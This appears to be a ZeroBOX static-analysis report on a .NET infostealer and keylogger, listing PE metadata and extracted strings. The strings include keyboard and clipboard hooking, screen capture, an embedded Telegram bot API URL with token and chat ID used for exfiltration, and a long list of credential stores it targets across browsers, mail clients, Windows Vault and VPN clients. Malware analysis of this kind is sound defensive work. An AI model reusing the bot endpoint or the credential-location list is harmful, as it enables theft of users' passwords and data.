Static | ZeroBOX

PE Compile Time

2023-10-06 00:01:41

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x0003a034 0x0003a200 5.00115353677
.rsrc 0x0003e000 0x00000546 0x00000600 4.00731908222
.reloc 0x00040000 0x0000000c 0x00000200 0.0980041756627

Resources

Name Offset Size Language Sub-language File type
RT_VERSION 0x0003e0a0 0x000002bc LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x0003e35c 0x000001ea LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

Strings

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
com.apple.Safari
Unable to resolve HTTP prox
1SPS*
KDBM((
v4.0.30319
#Strings
%>HPV`h
! 9 Y }
1P1:1-1
mLX8LWBOA0
3JyIsTeG0
YlOKi21J0
SHf0Q0
4MDHXXrKS0
OQ8HrObVc0
sawfov33dd0
psLde0
Tdgjrt0
0a49u0
$$method0x6000120-1
$$method0x6000191-1
$$method0x6000105-1
$$method0x6000115-1
$$method0x6000255-1
$$method0x600011a-1
$$method0x600008c-1
$$method0x600007d-1
$$method0x600011f-1
$$method0x600013f-1
$$method0x60000ff-1
35gsPoCO31
7f774f41-d19b-45d0-93bb-bcea6f138241
dvE0Iurf91
HMACSHA1
VT_UI1
0DPMaavXS1
okmq7ZuS1
o4bQW1
bKrAX1
IEnumerable`1
ICollection`1
IEnumerator`1
IList`1
NoNaMPa1
yEWqc1
CS$<>9__CachedAnonymousMethodDelegate1
get_Item1
$$method0x6000115-2
$$method0x6000255-2
$$method0x60000ff-2
HMACSHA512
Advapi32
kernel32
Microsoft.Win32
user32
ToUInt32
ReadInt32
ToInt32
L62nrvDU92
giYqZF2
3J5H0bH2
VT_UI2
5Tkik5nWT2
KeyValuePair`2
Dictionary`2
2UbdAgX0h2
eUeNXtqtj2
LXEf1CjD5k2
tBfqDJkk2
get_Item2
MqVWYrt2
FXPRzbfuAw2
WWwuAiZ7Ez2
0iqwb6r53
4Yp7Eug63
oYiON3
R0eiZTP3
Tuple`3
aXzTh9Yxb3
376qXJRej3
get_Item3
CG5tw3
ToUInt64
ReadInt64
ToInt64
AX5QA94
ixnKzmdB4
5LoKCTZYKH4
VT_UI4
bURfnT4
s0zbVVKvXd4
Th2O0JdP3e4
i17hPkh4
sNwWRi4
OrKvf55
2K81zGA65
dEp9tq16sC5
zLg6wVgF5
JDXm8JviM5
y68udQIHkR5
4tir8E4b5
vrAWavBrc5
3Bvw7GSCrh5
nTHuC9O9j5
vuaN1zq6So5
4Q2bh6KD8t5
bjC0xULt5
IS_TEXT_UNICODE_ASCII16
IS_TEXT_UNICODE_REVERSE_ASCII16
ToUInt16
ReadInt16
ToInt16
HMACSHA256
4QvRK6
u2URRdjX6
7VaALNYg6
Frujj6
j21Cc37
7fU5B7
0xZUF7
HqsxSdH7
VaultGetItem_WIN7
sc1GAGO7
zsO6k7
GhnrmsiIt7
cRNzjBx7
QdEaQs798
FKgrC8
get_UTF8
VT_UI8
VaultGetItem_WIN8
koxMLDQ8
2M779yd8
6yXGj8
QST9lj8
BLOnlS9k8
5sWFR9
CQ1KzqwfV9
i9VKgnhm9
rYGuddUro9
LIQQ4gNv9
<Module>
F1Aw33A
vhAc4A
kkeaBA
d0YMdA
zNsY9B
DUxSWCB
BCRYPT_KEY_DATA_BLOB
VT_BLOB
cpjKUanB
JRBlWU6lBqB
E7DOvB
fvPNAhyec5C
llmYRJ7C
5CZxQfAC
T7hFFC
BCRYPT_KEY_DATA_BLOB_MAGIC
BJ8PL6pI0SC
zybR0CD
LLKHF_EXTENDED
LLKHF_INJECTED
3IVnz2FD
RZ9OfVqAHD
VT_CLSID
get_ID
set_ID
FileHandleID
fileHandleID
lpdwProcessID
processID
get_FormatID
set_FormatID
aHPZ4uNPD
gkfvuvlcXD
czhIzwdD
7L1pfjlD
DUPLICATE_CLOSE_SOURCE
BCRYPT_CHAINING_MODE
3nrebXxDE
VT_STORAGE
13mLJE
INVALID_HANDLE
VT_FILETIME
hJW4x2doPE
IS_TEXT_UNICODE_SIGNATURE
IS_TEXT_UNICODE_REVERSE_SIGNATURE
VT_DATE
IS_TEXT_UNICODE_DBCS_LEADBYTE
Gy26Q0K27pE
nRaW2frE
i1JOl0F
kg1lAF
dD32YUKF
PHLyLDJuKF
G0GbX6t7NF
sWa1PJdF
mgPwWlF
tIcbzFn4AzF
yy6rXdZG5G
tiq898G
Tj32oG9G
BCRYPT_AUTH_MODE_CHAIN_CALLS_FLAG
LArMAG
qGAlCcoVWQG
PYI4nQG
IicScPhBvUG
trRkisxPaG
t1zooG
6OCwoG
gLx7l8pvG
HOH9t3D20H
STATUS_AUTH_TAG_MISMATCH
STATUS_INFO_LENGTH_MISMATCH
a90pDVINEH
mdkej1JH
wmSxgkgNH
7nbaqS1KPH
Z8eZFTH
IS_TEXT_UNICODE_ODD_LENGTH
BCRYPT_AUTH_TAG_LENGTH
BCRYPT_OBJECT_LENGTH
lNrluMAYH
0QriE5wH
bJl3nxH
SsPL2auyzH
W7omEf6I
cKJH9I
GwlJ2rUzRAI
get_ASCII
aRtd3GIcCMI
EmUxMI
eNoGsy2xuI
Pp8vmfVUJ
blUncJ
MNJw1XQfJ
ugF2HigJ
g0d2X3iJ
3ilOLiJ
W0Hc7tlJ
Tot13wFenJ
eOsw1K
VWKT3K
GZ8TO8K
gnQIE6YCOK
zQdqROsGWQK
IS_TEXT_UNICODE_UNICODE_MASK
IS_TEXT_UNICODE_NOT_UNICODE_MASK
IS_TEXT_UNICODE_REVERSE_MASK
IS_TEXT_UNICODE_NOT_ASCII_MASK
teI93TyZK
KaLNahx7lrK
VT_DECIMAL
DaqUYHL
R8YIIL
VT_NULL
WH_KEYBOARD_LL
VT_BOOL
g1YyJziWL
7pdkTFmwfL
PoLQBDlL
pzUXASnelL
S361hZEBAtL
VT_VERSIONED_STREAM
VT_STREAM
BCRYPT_CHAIN_MODE_GCM
BCRYPT_AES_ALGORITHM
MOdHMM
DEWvyCuM
tdKAQFnc3N
rFWqySR9A8N
QWVVfqRjmFN
0eDVIMHSGN
BCRYPT_INIT_AUTH_MODE_INFO_VERSION
HC_ACTION
LLKHF_ALTDOWN
WM_SYSKEYDOWN
WM_KEYDOWN
dqf8ArXN
b6IEYN
BvXumYN
d4ZoYN
lSajM2xymfN
dXZzcqN
Fe7m1DO
System.IO
zVZSwluwHKO
z8DalLO
lhDNJhOO
gaC4eO
aXysLQlvI4P
BCRYPT_PAD_OAEP
hvPvYD5KP
3nHCD6IQKP
IhFfSTgKP
0zrKLP
eDLx4pWgkLP
UYutCYDyxOP
dcU3oSP
WM_SYSKEYUP
WM_KEYUP
LLKHF_UP
BdjzQgEbP
Q6W9t6PQzdP
WSgHYxBTjP
Hrwo4mP
PdcQ9Mv02Q
4UB6Aeofx3Q
a14kxdtjH5Q
hR33WsQaM8Q
fo9WzEQ
tDMmsI6NIQ
CVLeJQ
MDZQipeOQ
eL35O2VQ
kSTBhQ
rAVGH9amQ
8VHExQ
1a5nS0K0R
80A47R
MS_PRIMITIVE_PROVIDER
VdJpkBLR
VT_ERROR
VT_VECTOR
VT_BSTR
VT_LPSTR
VT_LPWSTR
uj7AaaR
MGFK7U3ybR
PWmhVMZzwR
ITAMYxzR
Zg2eBS
IS_TEXT_UNICODE_STATISTICS
IS_TEXT_UNICODE_REVERSE_STATISTICS
5jsWMIES
IS_TEXT_UNICODE_NULL_BYTES
IS_TEXT_UNICODE_CONTROLS
IS_TEXT_UNICODE_REVERSE_CONTROLS
IS_TEXT_UNICODE_ILLEGAL_CHARS
7wqmwRS
DUPLICATE_SAME_ACCESS
ERROR_SUCCESS
STATUS_SUCCESS
BCRYPT_PAD_PSS
xyPcAMirlS
JJA1zS
9pMqT1T
Jc4g1T
IPV43ILHi2T
Iq2dPd5p8T
jgF8hC8BT
9UsLQ1zET
VT_UINT
VT_INT
QcERpZBQnRT
4D6YrM7qeT
BwP3iT
TOLbnT
MfoRrT
OCvYworT
KZpHTD8za7U
NPYymFEU
sNqEMU
5GWpa1NPU
cK0o2cDXU
69LDYU
k5GWIDMbyU
UtEpE14V
inzNv6M8V
2gPT2UMptCV
mirTLEak7EV
get_IV
set_IV
PaCgsSbV
K3JVyV
KDgOouNz1W
gYBWj0kAW
xSqBaHfTBW
STATUS_BUFFER_OVERFLOW
ZLNc5qQW
vLUqc16VW
0LMpSbW
luizWn1ccqW
JLXaEX
SWW6lTGg4IX
KkgnMX
3MG6RfChX
ThRfVsX
XTci4vX
VT_ARRAY
iBh7BY
AjjC5lL6wEY
Tzo8DchHY
VT_EMPTY
Oq47lY
3VZNQfZ6Z
fnxxOGZ
C1vMgZJZ
VhWiDEOZ
6FDSacrVOZ
HTDGffAN6UZ
Sjr1k4lZ
aSz4kZJqZ
value__
xaoby4Ea
get_Data
set_Data
cbData
ProtectedData
cbAuthData
pbAuthData
PropertyData
SetQuota
TaWNahy4b
fFbWwK0AhGb
UMCTF0VlIHb
PublicIpAddressGrab
mscorlib
YxZnZqtWqb
HlJSyCwb
bnaQZOKZwb
M8TgXQsbIzb
CHTz5E07c
NomEs5Hc
yADXQc
WFyKWc
qivpRplHZic
System.Collections.Generic
Microsoft.VisualBasic
KrjyuABlc
WndProc
HookProc
FromFileTimeUtc
4dhDZcPwc
HvX2Bd
N2jSWtYBd
ySzPG6XMHd
get_Id
SchemaId
schemaId
pszAlgId
HookId
eQP0lovmId
GetWindowThreadProcessId
processId
ChatId
SchemaElementId
I3QARd
PageExecuteRead
OpenRead
FileMapRead
VirtualMemoryRead
CreateThread
lpcbNeeded
DomainExtended
SHA1Managed
RijndaelManaged
add_Changed
remove_Changed
get_LastModified
set_LastModified
_lastModified
Interlocked
set_Enabled
get_IsEnabled
set_IsEnabled
_enabled
Undefined
lpOverlapped
samDesired
add_Elapsed
get_LastAccessed
set_LastAccessed
_lastAccessed
get_Reserved
reserved
System.Collections.Specialized
dO84ghd
TorPid
activeWindowPid
pPackageSid
row_id
get_IsInvalid
get_Guid
vaultGuid
PcHwid
<ID>k__BackingField
<FormatID>k__BackingField
<Data>k__BackingField
<LastModified>k__BackingField
<IsEnabled>k__BackingField
<LastAccessed>k__BackingField
<Password>k__BackingField
<password>k__BackingField
<PropertyStorage>k__BackingField
<Name>k__BackingField
<FileName>k__BackingField
<ApplicationName>k__BackingField
<Username>k__BackingField
<username>k__BackingField
<Type>k__BackingField
<type>k__BackingField
<TypedPropertyValue>k__BackingField
<Size>k__BackingField
<IsRunning>k__BackingField
<Path>k__BackingField
<hostmask>k__BackingField
<Version>k__BackingField
<Application>k__BackingField
<Description>k__BackingField
<user>k__BackingField
<hoster>k__BackingField
<Tasks>k__BackingField
<objects>k__BackingField
<Accounts>k__BackingField
<Keys>k__BackingField
<Lenght>k__BackingField
<Host>k__BackingField
<GuidMasterKey>k__BackingField
GetField
TrimEnd
ReadToEnd
AppEnd
Append
get_Millisecond
GetUpperBound
GetLowerBound
set_Method
method
Clipboard
get_Password
set_Password
DomainPassword
get_password
set_password
E9UPn7twDud
vN57tBOe
AJ3u4kxMOe
LgQSab2NVe
Xsxu8ofDbe
sO96kWwcbe
Replace
DeleteBackspace
QueryDosDevice
hInstance
IdentityReference
Sequence
cbNonce
pbNonce
Resource
vkCode
wScanCode
scanCode
keyCode
set_Mode
FileMode
ShareMode
PaddingMode
CryptoStreamMode
CipherMode
SelectSingleNode
XmlNode
get_Unicode
get_BigEndianUnicode
IsTextUnicode
le11hfe
FromImage
SectionImage
get_PropertyStorage
set_PropertyStorage
SerializedPropertyStorage
SendMessage
AddRange
CompareExchange
CredentialCache
SectionNoCache
EndInvoke
BeginInvoke
GetEnvironmentVariable
SetEnvironmentVariable
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
hSourceHandle
SafeHandle
GetModuleHandle
RuntimeTypeHandle
ReleaseHandle
CloseHandle
DuplicateHandle
CreateHandle
GetTypeFromHandle
hSourceProcessHandle
hTargetProcessHandle
lpTargetHandle
bInheritHandle
vaultHandle
activeWindowHandle
handle
Rectangle
ToSingle
CreateFile
hTemplateFile
DeleteFile
WriteFile
MoveFile
MapViewOfFile
UnmapViewOfFile
lastTitle
activeWindowTitle
lphModule
get_MainModule
ProcessModule
get_Name
set_Name
lpDeviceName
get_FileName
set_FileName
GetModuleFileName
lpExistingFileName
lpFileName
GetFileName
lpNewFileName
_fileName
get_ModuleName
lpModuleName
lpBaseName
baseName
lpValueName
StartupRegName
rootPathName
get_OSFullName
get_FullName
OperatingSystemName
get_ApplicationName
set_ApplicationName
StartupInstallationName
lpName
lpAppName
get_UserName
get_ComputerName
ThisComputerName
ProcessorName
get_ProcessName
processName
StartupEnvName
GetProcessesByName
lpKeyName
pszCredentialFriendlyName
StartupDirectoryName
GetDirectoryName
astable_name
item_name
Filename
filename
get_Username
set_Username
get_username
set_username
DateTime
GetLastAccessTime
dwTime
AppendLine
get_NewLine
Combine
LocalMachine
Escape
Unescape
DataProtectionScope
get_Type
set_Type
pszBlobType
GetFileType
MimeType
ValueType
LogType
SecurityProtocolType
GetType
set_ContentType
item_type
get_type
set_type
FileShare
Compare
System.Core
PtrToStructure
get_InvariantCulture
Capture
NameObjectCollectionBase
HttpWebResponse
GetResponse
Dispose
Reverse
X509Certificate
GenericCertificate
DomainCertificate
Create
KBDLLHookProcDelegate
MulticastDelegate
Terminate
PcState
GetKeyboardState
lpKeyState
GetKeyState
Delete
PageReadWrite
PageExecuteReadWrite
nNumberOfBytesToWrite
FileMapWrite
VirtualMemoryWrite
Remote
STAThreadAttribute
CompilerGeneratedAttribute
GuidAttribute
SecuritySafeCriticalAttribute
ExtensionAttribute
AssemblyFileVersionAttribute
FlagsAttribute
CompilationRelaxationsAttribute
ReliabilityContractAttribute
ParamArrayAttribute
RuntimeCompatibilityAttribute
SuppressUnmanagedCodeSecurityAttribute
set_UseShellExecute
FileMapExecute
ReadByte
ToByte
get_Value
HandleValue
TryGetValue
get_TypedPropertyValue
set_TypedPropertyValue
GetPropertyValue
set_KeepAlive
Remove
SectionReserve
eBun168hye
get_Size
set_Size
dataSize
cbSize
get_StorageSize
lpFileSize
get_NameSize
volumeNameSize
nFileSystemNameSize
SQLDataTypeSize
get_StoreSize
get_ValueSize
get_HashSize
set_BlockSize
chunkSize
get_KeySize
Serialize
Deserialize
Initialize
Finalize
Synchronize
page_size
Resize
Tq8zfrq5f
gB3knJMf
SizeOf
get_ItemOf
LastIndexOf
8EyYbbUf
cchBuff
bSjTImwn4gf
RyoS4l1wXif
dvXZjf
5JGqolf
lastInputInf
G7im7sf
M6JkzIzf
WApjAg
oH693OIIGFg
TWvTHg
xQPmZzQg
GGSHKZ1Wg
BgHHWg
CgLpRalecZg
m731wZg
B91AXteKdeg
get_Jpeg
HmxDfNQrXig
System.Threading
get_Padding
set_Padding
UTF8Encoding
encoding
System.Drawing.Imaging
get_IsRunning
set_IsRunning
CreateFileMapping
FromBase64String
ToBase64String
EscapeDataString
UnescapeDataString
lpReturnedString
GetPrivateProfileString
ToString
GetString
OctetString
BitString
Substring
System.Drawing
DeQ5Ypg
get_Msg
JKnr8Y3h
ovx2V4h
XXpnoKzSh
dnL5ulvUqTh
G5tGfh
dwMaximumSizeHigh
dwFileOffsetHigh
STI1thh
aXBbx1bEXlh
gGrkNoh
IiTFZmKph
ComputeHash
get_Path
set_Path
SystemAppdataPath
get_ExecutablePath
AsmFilePath
AppStartupFullPath
GetTempPath
GetFolderPath
lpTargetPath
StartupDirectoryPath
get_Width
get_Length
MaximumLength
dwMinLength
SystemInformationLength
ObjectInformationLength
set_MaxJsonLength
ReturnLength
maximumComponentLength
GetWindowTextLength
dwMaxLength
EndsWith
StartsWith
aDrWYpth
EQFwzel9i
Ykzri6di
A3oWiQYNbki
PtrToStringUni
StringToHGlobalUni
rJHqQaLZoi
TelegramApi
twYgl0Zpi
vnS3F30j
zySvPCY2j7j
QUNRMbjZj
objrij
VyDBgXwj
JTSKrEk
ZlvRhFk
8IWYrLBfGk
N9ZVqSk
3V38CLTYk
AsyncCallback
RemoteCertificateValidationCallback
get_ServerCertificateValidationCallback
set_ServerCertificateValidationCallback
callback
get_CapsLock
TransformFinalBlock
TransformBlock
idHook
_clipboardHook
_keyboardHook
get_hostmask
set_hostmask
VZBYihjxk
ZiN7CHrCAl
Cv7eGl
kLvAIl
AllocHGlobal
FreeHGlobal
Illegal
Marshal
Decimal
System.Security.Principal
set_Interval
ScreenInterval
KeyloggerInterval
Rijndael
cbLabel
pbLabel
System.ComponentModel
EnableTorPanel
3iiShAbil
Kernel32.dll
kernel32.dll
User32.dll
user32.dll
vaultcli.dll
psapi.dll
ntdll.dll
bcrypt.dll
System.Xml
set_SecurityProtocol
Control
Yxc6Uggsl
nOdVtl
DnmWzl
qc64A0m
001y0PabBm
TkerNm
rZqdR5Wm
c6cc6PW0hZm
FileStream
get_BaseStream
GetResponseStream
CryptoStream
GetRequestStream
MemoryStream
get_LParam
get_WParam
get_Param
lParam
wParam
get_Item
set_Item
VaultGetItem
vaultItem
OperatingSystem
HmacAlgorithm
SymmetricAlgorithm
phAlgorithm
KeyedHashAlgorithm
algorithm
jCWoN9zEmm
Random
hzBAKFZvpm
ICryptoTransform
unlDmKmtm
Maximum
root_num
HqBgwhu84n
Kd5ulvaW2Cn
5YTnMn
sAZHA5lnBQn
A7JvpXnNcTn
WypQ61MYn
ToBoolean
IsLittleEndian
CopyFromScreen
get_PrimaryScreen
lpNumberOfBytesWritten
X509Chain
ChangeClipboardChain
Extension
get_OSVersion
get_Version
set_Version
dwInfoVersion
get_Application
set_Application
get_Location
ObjectDataInformation
SystemRegistryQuotaInformation
SystemBasicInformation
ObjectBasicInformation
QueryLimitedInformation
SystemPerformanceInformation
SystemProcessorPerformanceInformation
SystemLookasideInformation
SystemHandleInformation
ObjectNameInformation
GetVolumeInformation
ObjectTypeInformation
ObjectAllInformation
NtQuerySystemInformation
SystemExceptionInformation
SystemProcessInformation
ObjectInformation
SetInformation
SystemInterruptInformation
SystemTimeOfDayInformation
QueryInformation
VirtualMemoryOperation
pszImplementation
System.Globalization
System.Web.Script.Serialization
System.Reflection
PropertyDataCollection
NameValueCollection
MatchCollection
GroupCollection
KeysCollection
ManagementObjectCollection
KeyCollection
set_Position
CreationDisposition
SearchOption
Win32Exception
CryptographicException
ArgumentOutOfRangeException
ArgumentException
get_Description
set_Description
get_StatusDescription
_description
System.Runtime.ConstrainedExecution
StringComparison
01q3RaCzSpn
add_KeyDown
remove_KeyDown
get_CtrlKeyDown
get_ShiftKeyDown
get_AltKeyDown
Unknown
CompareTo
CopyTo
lastInPutNfo
dwExtraInfo
ImageCodecInfo
FieldInfo
FileInfo
CultureInfo
pPaddingInfo
FileSystemInfo
MemberInfo
ComputerInfo
get_StartInfo
ProcessStartInfo
GetLastInputInfo
DirectoryInfo
DYcKcJDjo
OQgb0DIipo
OuJ695XlAp
pPZnH4Np
add_KeyUp
remove_KeyUp
9Wst8Xp
dwNumberOfBytesToMap
Bitmap
qYrmdp
e6ecDXykjp
UOdzFjNh1lp
TimeStamp
LocalApp
oZxJup
AppAddStartup
HideFileStartup
EYCSy0Rzp
UScq8I4q
zcyqF9q
ulcWm4Dq
ZkTaEq
jZlK1PPq
TAQ7pHqwSq
3ed4P6Wq
pQTYdq
x9oKkq
yjoPkTsUimq
System.Linq
7gUMFwQhJ1r
rNrKAr
UnCZdCIr
qI4J1xNuNLr
AQ5qhCGwZr
ToChar
lpChar
DirectorySeparatorChar
ObjectTypeNumber
volumeSerialNumber
StreamReader
TextReader
BinaryReader
SHA1CryptoServiceProvider
MD5CryptoServiceProvider
RNGCryptoServiceProvider
TripleDESCryptoServiceProvider
BCryptCloseAlgorithmProvider
BCryptOpenAlgorithmProvider
IFormatProvider
StringBuilder
SpecialFolder
sender
Encoder
volumeNameBuffer
fileSystemNameBuffer
buffer
ServicePointManager
Integer
EnableClipboardLogger
EnableScreenLogger
_screenLogger
_keyLogger
EnableKeylogger
ManagementObjectSearcher
ObjectIdentifier
SecurityIdentifier
ElapsedEventHandler
LogTimer
ToUpper
CurrentUser
get_user
set_user
EncoderParameter
Object_Pointer
BitConverter
get_hoster
set_hoster
BinaryFormatter
SetClipboardViewer
ToLower
dpQnCzer
JavaScriptSerializer
5kQDor
get_Major
get_Minor
GetLastWin32Error
GetLastError
Authenticator
IEnumerator
ManagementObjectEnumerator
GetEnumerator
RandomNumberGenerator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
passwordVaultPtr
ReadIntPtr
gd9eatr
VG2SYyr
RMqf7s
zV2FRs
Graphics
System.Diagnostics
get_Bounds
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
GetInstances
get_ChildNodes
Matches
EnableCookies
GetDirectories
master_table_entries
get_Properties
ExpandEnvironmentVariables
GetFiles
EnumProcessModules
NumberStyles
GetSubKeyNames
field_names
ReadAllLines
GetProcesses
System.Security.Cryptography.X509Certificates
FlagsAndAttributes
lpFileMappingAttributes
SecurityAttributes
FileBytes
Rfc2898DeriveBytes
ReadAllBytes
BufferBytes
GetBytes
db_bytes
get_Values
GetLogicalDrives
fileSystemFlags
dwFlags
ElapsedEventArgs
1jwN8Qsp0hs
get_Ticks
get_Tasks
set_Tasks
y04kgyWqPls
ICredentials
set_Credentials
get_DefaultCredentials
Equals
CreateParams
VaultEnumerateItems
System.Windows.Forms
Contains
System.Web.Extensions
System.Text.RegularExpressions
iterations
System.Collections
set_MaximumAutomaticRedirections
StringSplitOptions
RegexOptions
options
get_Groups
A8Gl9hBrs
get_Chars
GetImageEncoders
System.Timers
RuntimeHelpers
EncoderParameters
SslPolicyErrors
SystemInformationClass
ObjectInformationClass
ManagementClass
dwDesiredAccess
GrantedAccess
FileAccess
FileMapAllAccess
processAccess
get_Success
CreateProcess
hProcess
OpenProcess
GetCurrentProcess
lpBaseAddress
PublicIpAddress
get_objects
set_objects
VaultEnumerateVaults
pPropertyElements
set_Arguments
get_Accounts
set_Accounts
get_Exists
yrHJHuts
dV5ntPF7Uws
get_Keys
set_Keys
get_ModifierKeys
N0PqoFAzs
c8GWfTCt
lA3XTt
Concat
AppendFormat
ImageFormat
Subtract
VT_BLOB_Object
VT_STREAMED_Object
VT_STORED_Object
ManagementBaseObject
hFileMappingObject
hObject
ManagementObject
cbKeyObject
pbKeyObject
NtQueryObject
object
Collect
set_AllowAutoRedirect
flProtect
Unprotect
System.Net
P6FqQEo1Set
offset
SGZiFJ4gt
get_Height
get_Lenght
set_Lenght
op_Explicit
SectionCommit
WaitForExit
cbSalt
1PIjlt
VaultOpenVault
get_Default
lpDefault
pcbResult
IAsyncResult
phkResult
result
UnsignedInt
rqYaZdnt
set_UserAgent
PublicUserAgent
System.Management
pResourceElement
XmlElement
pAuthenticatorElement
pIdentityElement
dwIncrement
sql_statement
Environment
XmlDocument
get_Parent
GetParent
get_Current
content
get_Count
get_HandleCount
get_TickCount
vaultItemCount
set_IterationCount
dwPropertiesCount
vaultCount
BCryptDecrypt
BCryptEncrypt
TrimStart
AppStart
Convert
UnsignedShort
HttpWebRequest
XmlNodeList
ToList
MozillaBrowserList
ChromiumBrowserList
get_Host
set_Host
set_Timeout
GetKeyboardLayout
dwLayout
cbInput
pbInput
cbOutput
pbOutput
get_StandardOutput
set_RedirectStandardOutput
Dk6JJD0dYxt
MoveNext
System.Text
LastCopiedText
KeylogText
ReadAllText
AppendAllText
get_InnerText
GetText
GetWindowText
Log_text
cbMacContext
pbMacContext
xf0nkK1u
Sq5Z60os1u
z8kKBcsj2u
F4hhAD88u
kat4RWFjAu
THgqDu
cJhceWaFu
Fk7vfvDMlbu
1IDSqXju
WmJMIW82v
kVLgM3v
csWVAAv
e4ZC3cbUCv
j2eHv0peZOv
4FUVbmQv
ns4a1AAJ5kv
4rzmdrv
YmOMpGP5w
d4veP5w
CVJZwJEw
ur2JRw
7W48puiw
dwMaximumSizeLow
dwFileOffsetLow
get_Now
GetForegroundWindow
NativeWindow
set_CreateNoWindow
SjVOyw
4iiFjAzw
tQ2KeYm0Bx
PWUhdEx
ToUnicodeEx
GetModuleFileNameEx
RegQueryValueEx
GetFileSizeEx
UnhookWindowsHookEx
SetWindowsHookEx
CallNextHookEx
MaximumEx
RegOpenKeyEx
8jG5zb6Mx
tf6qpSx
iU8YEgKGyTx
hdDvSUx
rBnUqxnVx
ucchMax
BufferEndIndex
BlockIndex
BufferStartIndex
P0W9ODhx
AdlEI7nx
9z5aTupx
ikQgH6xx
yzcHpqI5y
jCT5sNB9V6y
ProtectedArray
ToByteArray
InitializeArray
ToArray
ToCharArray
Consistency
nyx5ey
get_Key
set_Key
OpenSubKey
subKey
RegCloseKey
get_GuidMasterKey
set_GuidMasterKey
_guidMasterKey
ContainsKey
wVirtKey
hImportKey
BCryptImportKey
BCryptDestroyKey
RegistryKey
_wsftpkey
System.Security.Cryptography
GetExecutingAssembly
PageReadonly
Multiply
PageWriteCopy
BlockCopy
FileMapCopy
System.Runtime.Serialization.Formatters.Binary
AmountOfMemory
get_TotalPhysicalMemory
Directory
Registry
get_Capacity
Quality
op_Equality
op_Inequality
System.Security
System.Net.Security
Identity
IsNullOrEmpty
BCryptSetAlgorithmProperty
BCryptGetProperty
BCryptSetProperty
pszProperty
er109rcvy
u7QSM5J7z
24hH969z
RE5Egz
yfZZdktgz
cv10wtkCsrz
gG3exsz
$75cc1ebe-2556-439a-8d7f-5853ab4997dd
WrapNonExceptionThrows
1.0.0.0
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
pp p!p"p#p$p%p&p'p(p)p*p+p,p-p.p/p0p1p2p3p4p5p6p7p8p9p:p;p<p=p>p?p@pApDpEpFpGpHpKpfy|y
k#n+n9
45 6!7"8#9$:%;&<'=(>)?*@+A,B-C0D4E5F6G7H8I9K:N;O=QATD]FcJuPvTwVxYy]z`
BACAIHJHQPVUWUXU\[cbedfdgdhdidjdml
image/jpeg
/log.tmp
text/html
yyyy-MM-dd HH:mm:ss
<br>RAM:
MM/dd/yyyy HH:mm:ss
<br>CPU:
<br>OSFullName:
IP Address:
<br>User Name:
<br>Computer Name:
Time:
User Name:
Recovered!
Time:
OSFullName:
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
https://api.telegram.org/bot6469500942:AAEMP24TLJoJ148waovnFcbAoYTqdsUYQ2E/
749030041
appdata
yNfeJW
yNfeJW.exe
]</b> (
{CAPSLOCK}
{BACK}
control
{PageDown}
{KEYDOWN}
{Insert}
{KEYRIGHT}
{KEYLEFT}
{ALT+TAB}
{KEYUP}
{ALT+F4}
{PageUp}
{NumLock}
{CTRL}
{HOME}
{ENTER}
&quot;
<br><hr>Copied Text: <br>
logins
IE/Edge
2F1A6504-0641-44CF-8BB5-3612D865F2E5
Windows Secure Note
3CCD5499-87A8-4B10-A215-608888DD3B55
Windows Web Password Credential
154E23D0-C644-4E6F-8CE6-5069272F999F
Windows Credential Picker Protector
4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Web Credentials
77BC582B-F0A6-4E15-4E80-61736B6F3B29
Windows Credentials
E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Windows Domain Certificate Credential
3E0E35BE-1B77-43E7-B873-AED901B6275B
Windows Domain Password Credential
3C886FF3-2669-4AA2-A8FB-3F6759A77548
Windows Extended Credential
00000000-0000-0000-0000-000000000000
SchemaId
pResourceElement
pIdentityElement
pPackageSid
pAuthenticatorElement
UC Browser
UCBrowser\
Login Data
journal
wow_logins
Safari for Windows
\Common Files\Apple\Apple Application Support\plutil.exe
\Apple Computer\Preferences\keychain.plist
<dict>
<string>
</string>
<data>
</data>
<array>
-convert xml1 -s -o "
\fixed_keychain.xml"
\Microsoft\Credentials\
\Microsoft\Protect\
credential
QQ Browser
\Default\EncryptedStorage
\EncryptedStorage
Profile
Tencent\QQBrowser\User Data
entries
category
Password
password_value
IncrediMail
SmtpPassword
PopPassword
Software\IncrediMail\Identities\
\Accounts_New
SmtpServer
EmailAddress
Eudora
Software\Qualcomm\Eudora\CommandLine\
current
Settings
SavePasswordText
ReturnAddress
Falkon Browser
startProfile=([A-z0-9\/\.\"]+)
profiles.ini
\browsedata.db
autofill
\falkon\profiles\
ClawsMail
\clawsrc
\Claws-mail
passkey0
master_passphrase_salt=(.+)
master_passphrase_pbkdf2_rounds=(.+)
\accountrc
smtp_server
address
account
\passwordstorerc
{(.*),(.*)}(.*)
Flock Browser
APPDATA
\Flock\Browser\
signons3.txt
DynDns
username=
password=
https://account.dyn.com/
ALLUSERSPROFILE
Dyn\Updater\config.dyndns
t6KzXhCh
Dyn\Updater\daemon.cfg
global
accounts
account.
username
password
Psi/Psi+
\Psi\profiles
\Psi+\profiles
\accounts.xml
OpenVPN
Software\OpenVPN-GUI\configs
Software\OpenVPN-GUI\configs\
auth-data
entropy
remote
USERPROFILE
\OpenVPN\config\
NordVPN
NordVpn.exe*
user.config
//setting[@name='Username']/value
//setting[@name='Password']/value
Private Internet Access
ProgramFiles(x86)
\Private Internet Access\data
\account.json
.*"username":"(.*?)"
